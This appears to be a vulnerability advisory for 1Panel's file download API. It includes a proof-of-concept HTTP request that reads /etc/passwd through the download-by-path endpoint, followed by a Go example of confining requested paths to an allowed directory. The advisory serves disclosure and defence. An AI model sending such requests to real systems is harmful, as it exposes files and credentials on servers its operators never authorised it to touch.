1Panel Arbitrary File Download vulnerability
Description

### Summary
An arbitrary file download vulnerability exists in the 1Panel backend.

### Details
Authenticated attackers can download arbitrary files through the API interface. The affected code permits unauthorized access.
![image](https://user-images.githubusercontent.com/116613486/257246024-d0e35800-5fd8-4907-8b1b-504afaad859e.png)

### PoC
Payload:

```
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json

{"path":"/etc/passwd"}
```

![f77959349e96543436eea18283fa75c](https://user-images.githubusercontent.com/116613486/257245459-13f2f31b-fcfe-4a27-ba52-e2f1e5d4d749.png)

### Impact
Attackers can freely download file contents from the target system. This will cause a large amount of information leakage.
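
One way a download-by-path handler can confine the client-supplied `path` to an allowed directory, as an added example (not 1Panel's code or its actual fix). The names `ResolveDownloadPath`, `within` and `ErrOutsideBase`, and the policy of a single allowed base directory, are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideBase reports a request that escapes the allowed directory.
var ErrOutsideBase = errors.New("path is outside the allowed directory")

// within reports whether p is base itself or a descendant of base.
func within(base, p string) bool {
	rel, err := filepath.Rel(base, p)
	return err == nil && rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// ResolveDownloadPath (hypothetical helper) validates a client-supplied "path"
// against baseDir and returns the real file to serve.
func ResolveDownloadPath(baseDir, requested string) (string, error) {
	base, err := filepath.EvalSymlinks(baseDir)
	if err != nil {
		return "", err
	}
	candidate := filepath.Clean(requested)
	if !filepath.IsAbs(candidate) {
		candidate = filepath.Join(base, candidate)
	}
	// Lexical check: rejects "/etc/passwd" and "../" sequences outright.
	if !within(base, candidate) {
		return "", ErrOutsideBase
	}
	// Resolve symlinks so a link inside base cannot point outside it.
	resolved, err := filepath.EvalSymlinks(candidate)
	if err != nil {
		return "", err
	}
	if !within(base, resolved) {
		return "", ErrOutsideBase
	}
	return resolved, nil
}

func main() {
	_, err := ResolveDownloadPath(os.TempDir(), "/etc/passwd") // path from the PoC
	fmt.Println(err)
}
```

The containment check is repeated after symlink resolution because the lexical check alone accepts a link that lives inside the base directory but points elsewhere.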
